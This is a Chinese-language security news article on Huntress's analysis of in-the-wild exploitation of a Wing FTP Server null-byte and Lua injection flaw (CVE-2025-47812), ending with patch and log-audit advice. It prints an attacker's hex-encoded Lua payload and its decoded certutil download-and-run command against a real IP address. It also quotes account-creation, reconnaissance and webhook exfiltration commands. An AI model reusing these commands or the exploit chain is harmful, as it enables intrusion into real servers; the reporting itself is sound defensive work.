2025年7月1日,Huntress在Wing FTP Server中发现了一个严重的远程代码执行(RCE)漏洞的积极利用,仅在该漏洞公开披露后一天。该漏洞被追踪为CVE-2025-47812,结合了空字节注入和Lua代码执行的强大能力,使攻击者能够获得root或SYSTEM级别的访问权限。
该漏洞的核心在于Wing FTP在处理用户名参数时错误地处理了空字节,特别是在请求loginok.html时,该页面负责处理身份验证。Huntress解释道:
“攻击者可以在用户名参数中使用空字节后进行Lua注入,”这种处理不当会破坏字符串处理,允许注入恶意代码。
该利用链包括登录(即使是匿名登录),在用户名后追加%00空字节,注入Lua代码,然后通过访问另一个页面(如dir.html)触发反序列化。结果是通过会话操控执行任意代码。
Huntress的分析师于2025年7月1日首次发现该漏洞的利用。通过他们的遥测和EDR工具,观察到在WFTPServer.exe进程下的漏洞利用行为。证据可以在会话文件和日志条目中找到,例如日志中被截断的一行:“请注意缺失的闭合引号——这是空字节在日志文件中断开了该条目。”
但明确的证据来自被篡改的Lua会话文件。其中一个文件包含了以下有效负载:
local cmd = hx("636572747574696c202d75726c6361636865202d6620687474703a2f2f3138352e3139362e392e3232353a383038302f454f70343565574c53703547355577705f794f436951202554454d50255c6d76766569574a48782e6578652026207374617274202f42202554454d50255c6d76766569574a48782e657865")
local h = io.popen(cmd)
local r = h:read("*a")
h:close()一旦解码,十六进制编码的二进制数据揭示了攻击者的真实意图:
certutil -urlcache -f http://185.196.9.225:8080/EOp45eWLSp5G5Uwp_yOCiQ %TEMP%\mvveiWJHx.exe & start /B %TEMP%\mvveiWJHx.exe该命令利用certutil下载并执行恶意软件,攻击受害者主机。
此次攻击时间线既是持续性攻击的典型案例,也是业余错误的表现。Huntress观察到,至少有五个不同的攻击者在一天内针对同一脆弱系统发起攻击。像net user wingftp 123123qweqwe /add这样的命令被用来创建新用户,同时侦察活动包括:
-
ipconfig
-
arp -a
-
whoami /priv
-
curl -s -d con https://webhook[.]site/…
其中一名攻击者甚至输入了c:^A.exe,不小心将SOH(开始标头)控制字符注入了命令中——这实际上导致了他们自己有效负载的失败。Huntress表示:“目前还不清楚他们是如何甚至为何打出这个命令的。”
尽管攻击者犯下了滑稽的错误,威胁依然真实存在。最终,一名攻击者尝试安装ScreenConnect以保持持久访问。幸运的是,Microsoft Defender介入,标记并删除了文件,识别为Trojan:Win32/Ceprolad.A,紧接着WFTPServer.exe崩溃,最终中止了攻击。
Wing FTP Server 7.4.4之前的版本存在漏洞。如果您正在运行此软件:
-
请立即更新到7.4.4版本或更高版本。
-
审查日志文件:C:\Program Files (x86)\Wing FTP Server\Log\Domains\
-
审计会话文件:C:\Program Files (x86)\Wing FTP Server\session\
-
特别注意大小异常或嵌入Lua函数的会话文件。
发表评论
您还未登录,请先登录。
登录